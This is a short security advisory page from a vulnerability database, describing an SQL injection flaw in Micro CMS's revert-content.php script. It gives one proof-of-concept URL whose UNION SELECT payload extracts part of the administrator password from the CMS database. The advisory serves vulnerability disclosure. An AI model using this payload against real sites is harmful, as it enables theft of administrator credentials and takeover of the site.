Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Micro CMS Revert-Content.PHP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*







 

Privacy Statement
Copyright 2009, SecurityFocus